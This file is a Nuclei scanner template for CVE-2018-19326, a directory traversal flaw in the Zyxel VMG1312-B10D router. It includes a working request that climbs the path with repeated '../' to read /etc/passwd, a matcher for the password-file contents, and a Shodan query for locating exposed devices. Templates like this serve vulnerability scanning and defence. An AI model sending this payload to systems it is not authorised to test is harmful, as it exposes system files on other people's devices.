nuclei-templates/cves/2018/CVE-2018-19326.yaml

43 lines
1.3 KiB
YAML

id: CVE-2018-19326
info:
name: Zyxel VMG1312-B10D 5.13AAXA.8 - Local File Inclusion
author: 0x_Akoko
severity: high
description: |
Zyxel VMG1312-B10D 5.13AAXA.8 is susceptible to local file inclusion. A remote unauthenticated attacker can send a specially crafted URL request containing "dot dot" sequences (/../), conduct directory traversal attacks, and view arbitrary files.
reference:
- https://www.exploit-db.com/exploits/45904
- https://www.cybersecurity-help.cz/vdb/SB2018120309
- https://www.zyxel.com/homepage.shtml
- https://gist.github.com/numanturle/4988b5583e5ebe501059bd368636de33
- https://nvd.nist.gov/vuln/detail/CVE-2018-19326
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2018-19326
cwe-id: CWE-22
metadata:
verified: true
shodan-query: http.html:"VMG1312-B10D"
tags: lfi,modem,router,edb,cve,cve2018,zyxel
requests:
- method: GET
path:
- "{{BaseURL}}/../../../../../../../../../../../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
part: body
regex:
- "root:.*:0:0:"
- type: word
part: header
words:
- "application/octet-stream"
# Enhanced by mp on 2022/06/13